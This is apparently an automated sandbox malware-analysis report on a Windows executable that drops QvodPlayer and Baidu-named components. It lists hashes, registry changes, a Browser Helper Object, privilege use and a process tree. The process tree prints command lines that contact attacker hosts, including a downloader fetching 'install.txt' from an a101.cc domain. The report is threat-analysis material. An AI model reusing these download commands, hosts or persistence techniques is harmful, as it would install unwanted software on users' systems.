Analysis
-
max time kernel
146s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
29-10-2022 12:55
Static task
static1
Behavioral task
behavioral1
Sample
24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe
Resource
win7-20220901-en
General
-
Target
24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe
-
Size
6.7MB
-
MD5
dbe8dc2af2a584445d0c980836ef2a68
-
SHA1
def2899ec195419e88032b342395753aef7d43d6
-
SHA256
24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1
-
SHA512
7d3821e8514a319fb354860950bd54030de6c358283a1fee614565f15bc9228da4b47dabeb29c4fde132ca0e0767ac06643083940304c83155064d22a25afc63
-
SSDEEP
196608:12KgmbWSnrvLOj15PBNY4XrdDGvO3qVQD:19MgTLOj15J2ydSvO5D
Malware Config
Signatures
-
Executes dropped EXE 6 IoCs
pid Process 984 kuaibo.exe 860 qvodupdate.exe 1528 qvodkunbang.exe 1828 BaiduP2PService.exe 1476 sr.exe 1640 BaiduP2PService.exe -
Loads dropped DLL 22 IoCs
pid Process 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 984 kuaibo.exe 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 860 qvodupdate.exe 860 qvodupdate.exe 860 qvodupdate.exe 860 qvodupdate.exe 860 qvodupdate.exe 860 qvodupdate.exe 860 qvodupdate.exe 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 1528 qvodkunbang.exe 1528 qvodkunbang.exe 1528 qvodkunbang.exe 1828 BaiduP2PService.exe 1828 BaiduP2PService.exe 1828 BaiduP2PService.exe 1528 qvodkunbang.exe 1640 BaiduP2PService.exe 1640 BaiduP2PService.exe 1640 BaiduP2PService.exe -
Installs/modifies Browser Helper Object 2 TTPs 8 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF} qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1} qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1} qvodupdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\NoExplorer = "1" qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3} qvodupdate.exe -
Drops file in Program Files directory 19 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Browser\config.ini qvodkunbang.exe File opened for modification C:\Program Files (x86)\tools\isWrite\ qvodkunbang.exe File created C:\Program Files (x86)\tools\P2PBase.dll qvodkunbang.exe File created C:\Program Files (x86)\QvodPlayer\tools.exe 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe File created C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe File opened for modification C:\Program Files (x86)\Browser\config.ini qvodupdate.exe File opened for modification C:\Program Files (x86)\tools\isWrite\ qvodupdate.exe File created C:\Program Files (x86)\tools\P2PStatReport.dll qvodkunbang.exe File created C:\Program Files (x86)\tools\sr.exe qvodkunbang.exe File opened for modification C:\Program Files (x86)\QvodPlayer\isWrite\ 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe File opened for modification C:\Program Files (x86)\QvodPlayer\ 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe File created C:\Program Files (x86)\QvodPlayer\qvodupdate.exe 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe File created C:\Program Files (x86)\tools\tools.exe qvodupdate.exe File opened for modification C:\Program Files (x86)\tools\ qvodkunbang.exe File created C:\Program Files (x86)\tools\BaiduP2PService.exe qvodkunbang.exe File created C:\Program Files (x86)\tools\P2SBase.dll qvodkunbang.exe File created C:\Program Files (x86)\QvodPlayer\kuaibo.exe 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe File opened for modification C:\Program Files (x86)\Browser\config.ini kuaibo.exe File opened for modification C:\Program Files (x86)\tools\ qvodupdate.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048ca5449a4d21846ba8a995ea0abd35a00000000020000000000106600000001000020000000291ed1e1f2e95048fecc453ed0ab4e37709477d5b136a28309b43af75f968d7e000000000e80000000020000200000006f1661f94a5fcf00d7bfcc1568f3711b0645aec3ed4642df777604033081234020000000d205892b3e8cb1b0cfa263f9e8d1334c58fbcb4905b8eee03c9fa3e9a3238e1e400000003d1cfa2594635a1de69683b5fccabf6f62c4b89ab7bd6ed541114bf6b56d215f2f93daf969f0b4680f850a49c9bd8f949e758ca6534193649f71500fa0c9be1d IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\AppName = "BaiduP2PService.exe" BaiduP2PService.exe Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048ca5449a4d21846ba8a995ea0abd35a000000000200000000001066000000010000200000004085eafbf734cc7427ab01a2740ff5140e75ad0b39561c81afd855e25756c50e000000000e80000000020000200000001ebee46f8f75ec2e0701e5a8a7d64a28afabdb0b29dbf007a5854d7a83a567259000000053457d614c642444739d4866d88ca4b97a2ce3a65ae227f8afca91687e435fb74140d34d8f551ff0ed1c60a20dd3c199bfa18e0eaa5219af9f261f60a8b14501df760e724a8bf5d465196fc4ce6310f9a47b093ccfb8f930bb1e4b223fcdaefc6273948f7dede664d66c4c55d2d96f453cf38d39531500d95b8a1a2f857ee1de0e0421fdc577628e14dfb6d6487e9a9a40000000b7cf155edb94983f221a805c15431f32dc165d32c3d6b6cc92a23ff6437bfa2765a98966518411096c146f1f90a4e77d00dc4605a44a3bbfc6bfdcdd3bb496cc IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2CB85E11-57B6-11ED-B559-F63187E7FFAB} = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 106f4908c3ebd801 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain IEXPLORE.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0} BaiduP2PService.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "373832521" IEXPLORE.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\AppPath = "C:\\Program Files (x86)\\tools" BaiduP2PService.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\Policy = "3" BaiduP2PService.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" IEXPLORE.EXE -
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1} qvodupdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\ = "AccountProtect Class" qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32 qvodupdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32\ = "C:\\ProgramData\\tools\\bdmanager.dll" qvodupdate.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_Classes\Local Settings qvodupdate.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 860 qvodupdate.exe 860 qvodupdate.exe 1528 qvodkunbang.exe 1528 qvodkunbang.exe 1528 qvodkunbang.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 860 qvodupdate.exe Token: SeDebugPrivilege 860 qvodupdate.exe Token: SeDebugPrivilege 1528 qvodkunbang.exe Token: SeDebugPrivilege 1528 qvodkunbang.exe Token: SeDebugPrivilege 1528 qvodkunbang.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 576 IEXPLORE.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 576 IEXPLORE.EXE 576 IEXPLORE.EXE 1984 IEXPLORE.EXE 1984 IEXPLORE.EXE 1984 IEXPLORE.EXE 1984 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 1048 wrote to memory of 984 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 27 PID 1048 wrote to memory of 984 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 27 PID 1048 wrote to memory of 984 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 27 PID 1048 wrote to memory of 984 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 27 PID 1048 wrote to memory of 860 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 28 PID 1048 wrote to memory of 860 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 28 PID 1048 wrote to memory of 860 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 28 PID 1048 wrote to memory of 860 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 28 PID 1048 wrote to memory of 860 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 28 PID 1048 wrote to memory of 860 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 28 PID 1048 wrote to memory of 860 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 28 PID 860 wrote to memory of 776 860 qvodupdate.exe 30 PID 860 wrote to memory of 776 860 qvodupdate.exe 30 PID 860 wrote to memory of 776 860 qvodupdate.exe 30 PID 860 wrote to memory of 776 860 qvodupdate.exe 30 PID 776 wrote to memory of 576 776 iexplore.exe 31 PID 776 wrote to memory of 576 776 iexplore.exe 31 PID 776 wrote to memory of 576 776 iexplore.exe 31 PID 776 wrote to memory of 576 776 iexplore.exe 31 PID 576 wrote to memory of 1984 576 IEXPLORE.EXE 33 PID 576 wrote to memory of 1984 576 IEXPLORE.EXE 33 PID 576 wrote to memory of 1984 576 IEXPLORE.EXE 33 PID 576 wrote to memory of 1984 576 IEXPLORE.EXE 33 PID 1048 wrote to memory of 1528 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 34 PID 1048 wrote to memory of 1528 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 34 PID 1048 wrote to memory of 1528 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 34 PID 1048 wrote to memory of 1528 1048 24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe 34 PID 1528 wrote to memory of 1828 1528 qvodkunbang.exe 35 PID 1528 wrote to memory of 1828 1528 qvodkunbang.exe 35 PID 1528 wrote to memory of 1828 1528 qvodkunbang.exe 35 PID 1528 wrote to memory of 1828 1528 qvodkunbang.exe 35 PID 1528 wrote to memory of 1476 1528 qvodkunbang.exe 36 PID 1528 wrote to memory of 1476 1528 qvodkunbang.exe 36 PID 1528 wrote to memory of 1476 1528 qvodkunbang.exe 36 PID 1528 wrote to memory of 1476 1528 qvodkunbang.exe 36 PID 1528 wrote to memory of 1640 1528 qvodkunbang.exe 38 PID 1528 wrote to memory of 1640 1528 qvodkunbang.exe 38 PID 1528 wrote to memory of 1640 1528 qvodkunbang.exe 38 PID 1528 wrote to memory of 1640 1528 qvodkunbang.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe"C:\Users\Admin\AppData\Local\Temp\24100d2cbef1793e814650b46b6b8d11fdf1472c669dfa7b2f316995e1c1b3e1.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Program Files (x86)\QvodPlayer\kuaibo.exe"C:\Program Files (x86)\QvodPlayer\kuaibo.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:984
-
-
C:\Program Files (x86)\QvodPlayer\qvodupdate.exe"C:\Program Files (x86)\QvodPlayer\qvodupdate.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Installs/modifies Browser Helper Object
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:860 -
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe" http://123.a101.cc/u.php?id=893⤵
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://123.a101.cc/u.php?id=894⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:576 CREDAT:275457 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1984
-
-
-
-
-
C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe"C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Program Files (x86)\tools\BaiduP2PService.exe"C:\Program Files (x86)\tools\BaiduP2PService.exe" init3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
PID:1828
-
-
C:\Program Files (x86)\tools\sr.exe"C:\Program Files (x86)\tools\sr.exe" "http://conf.a101.cc/tool/install.txt" "C:\ProgramData\Baidu\BaiduPlayer\3⤵
- Executes dropped EXE
PID:1476
-
-
C:\Program Files (x86)\tools\BaiduP2PService.exe"C:\Program Files (x86)\tools\BaiduP2PService.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1640
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.3MB
MD50f4a59c4371f318e6dc33818b622f15b
SHA1d81587fdc046592b32a0029abb7acc75f8be53fd
SHA2569ccddcba4b3984374dba79a50426c2b8643c9fe4a9af63f5e4f48b0461c4b74a
SHA512c1d9142159a14c36c48dc00ee9c773248987bc0c8eb2704ce61a0fba6f3715973d68ded26e9dfebd517a37b5654585ade22a7378a7449aa8c1c5a17197b02eee
-
Filesize
5.3MB
MD50f4a59c4371f318e6dc33818b622f15b
SHA1d81587fdc046592b32a0029abb7acc75f8be53fd
SHA2569ccddcba4b3984374dba79a50426c2b8643c9fe4a9af63f5e4f48b0461c4b74a
SHA512c1d9142159a14c36c48dc00ee9c773248987bc0c8eb2704ce61a0fba6f3715973d68ded26e9dfebd517a37b5654585ade22a7378a7449aa8c1c5a17197b02eee
-
Filesize
749KB
MD5832e350c2a1cef63ea75456005b803e8
SHA1c256fe3ab59478e049150b75f5e4a2572ea53354
SHA256aa28c3c961b4c5182ea4d3745c9421b697dc7f783df05a272f6c5577e61ee984
SHA5121279d10b885be2dad29b8aa66f32990f0faf9c3ce30ce268bf565559d3f409149b4c6a7c4fe784b694fe9c0f3e37d8650bb8baa5491ee32eeaa7af70cee2c945
-
Filesize
749KB
MD5832e350c2a1cef63ea75456005b803e8
SHA1c256fe3ab59478e049150b75f5e4a2572ea53354
SHA256aa28c3c961b4c5182ea4d3745c9421b697dc7f783df05a272f6c5577e61ee984
SHA5121279d10b885be2dad29b8aa66f32990f0faf9c3ce30ce268bf565559d3f409149b4c6a7c4fe784b694fe9c0f3e37d8650bb8baa5491ee32eeaa7af70cee2c945
-
Filesize
418KB
MD5264700020ac55b31ddeafd093f2aa813
SHA1beb9fd638fa2da9c511aa617c77585384b33c6a5
SHA2560af65866131b9e01847bba274de0da1535d4dd56018ba6aa22d1f0c0b1dbd649
SHA512f1d0e16ad6e20c32ba950cb8ecb0abbd9ab7201434eef7029d1da9326167b3141c40b5240969d4823ffeeaf028adda72be31aae54aa9660011e4f2bff38cc99d
-
Filesize
418KB
MD5264700020ac55b31ddeafd093f2aa813
SHA1beb9fd638fa2da9c511aa617c77585384b33c6a5
SHA2560af65866131b9e01847bba274de0da1535d4dd56018ba6aa22d1f0c0b1dbd649
SHA512f1d0e16ad6e20c32ba950cb8ecb0abbd9ab7201434eef7029d1da9326167b3141c40b5240969d4823ffeeaf028adda72be31aae54aa9660011e4f2bff38cc99d
-
Filesize
508KB
MD5012a8879efa6f8dbc3c6ba58a659fefb
SHA1d2a2dac321ff5a78de52e926044ba362f4004cde
SHA256774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66
SHA512b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba
-
Filesize
508KB
MD5012a8879efa6f8dbc3c6ba58a659fefb
SHA1d2a2dac321ff5a78de52e926044ba362f4004cde
SHA256774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66
SHA512b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba
-
Filesize
508KB
MD5012a8879efa6f8dbc3c6ba58a659fefb
SHA1d2a2dac321ff5a78de52e926044ba362f4004cde
SHA256774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66
SHA512b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba
-
Filesize
496KB
MD5a86a90ba120c455ac0e3655f146d5a0f
SHA1277c55191fbbadf888626df4fba279591632a406
SHA256577790026b949f666546299cd1dd002bc76447b86feed056cfe8c903a8039c43
SHA512a1d1d9386575187a81867db036c59ce76cede87a981fec7462283ccc0f76e0e8c8a85c6e66fd74a4305b6f402c224db9c1525e22015a4400d0bbedd1c72a9d47
-
Filesize
364KB
MD53b14cae0ea1d045bb5b196017913edb3
SHA17ca456595148f2d5e71444a612f2351c4cd8a20d
SHA256a2aeac1855ccb0bab911ddbfd7c79e86834020dc3c260a335249d41aff594982
SHA5126c475600f041c229f8fb330e201f658db58f1a46f016731e64cf65cee64242876c7b71aef671532f41106cc35de9963b599eb39b63e1d980ef911392fbf0a200
-
Filesize
512KB
MD5894ab861e608eacbac24280ab234368f
SHA1e283ef8757f04b0252ec5dce22e6e8094bed7737
SHA256687df23126f0da0348f8c5165b11b72982636177c6f53f5fe827c3f036fd83bb
SHA51226a78e26a60bfd48e93b1e61ede2cc2a7c9c9cb61bdd729f86b2692fed0eb4fedc72953ca83bc3fc945a0cc21d3d3232e73a03be39ea5755ddcc0dbd8ef3bed3
-
Filesize
154KB
MD583bcf3ad82ce65d2bd0fdd364fe32cb5
SHA132c5080bbf51dd22bed7f594a92f753a25eef73c
SHA2565635105c90c618c8db7a11cc031dbfb91aba92b0b8c960d6fb02f1fb4ff9758d
SHA512852c6176bd92c2fa4d8177764bcf8e6c9acb06cea488972376e6d6acb4e01c02f306f9b73ca36663f1c82b0443049e0898a0d6638a0760f957eade50a6ba8e81
-
Filesize
1KB
MD5d918285e8114454e25bd0ef145e4ac61
SHA1a894e26c0436df47b7b46fb000aba784366580ab
SHA25682cd3782df56b18cbe4c3f76deba526b7fa05ab3f6c4e371e032e52adcde3d44
SHA512c5d5521c92e0f111a148a3b6455c900533d1529678bc7c7ca95c5bb62bd2b7c905d98c180efa78a6f1a8718e1300cb7be02b8ac8c0170bdb49be6089486c77b5
-
Filesize
14KB
MD52b80eb58904a9c76c146128c8039534c
SHA13c34b4c4ee5036ebef3d411c9c16dcb6127718e1
SHA256916fddaa8b1b8418b166668dd1d944c654e1d475b795d2dfb1a863d757f88616
SHA512af18c547228f491e14b25c7a5d3e6e6496cbce6d1128e271028af83f82683c3e8bab8bd475d01c464a8b6524e123f38e2c97b7feb623f839284a3a9ebca5ad3d
-
Filesize
66KB
MD50dd21d0a21f47a54bdd4a8344c870839
SHA1f714a9e6062697ffe3bec31690f44579f2809b69
SHA256053eaa1b94f5d4ecdc740a338987580feef9d9fa6e994a9e9f17a0dac55612f7
SHA5129734cb39ae46ece49663ed63359521d5c327885c2de320419b0d2472dbeb6158e4f4c40d047d404c5f2643be6fd1eba3c9b02d6e1ede44e76b9daf0e70f9cb68
-
Filesize
17KB
MD5bf69cff7e66a3aa109dda84eb0232813
SHA1a5d83c6a2a3adc896a1eba23cd2db139e580d713
SHA2561c4494e1b1b52d5c9ef5142f084f950cd986159f9652277c496b48ef19d927c4
SHA5122a842f34dd57854523cc597851bcf4c094653e02ffc8d80228ab1e52742c12c26c19a9137685f202cb93a5c54838c985a814d29c0f9466fb616067bb273ef39a
-
Filesize
17KB
MD5d9f97bbefebd7f6680a5cd7e428e7c6e
SHA1b8f27fd1cecd21a0d893cd6c4d2900fcf5e657a9
SHA256bb445582d1ea6728c3ef6836d0523b3d36b36f3ebc1206cdfcde1ef92493f506
SHA5125808b085bdb028dae82434b255a0b1da3391409942899ecd4a7a01734e617f5e11a28d56e01d82aace80e5e37f395f43113cc8e96b532726388818f3c41d7f5d
-
Filesize
17KB
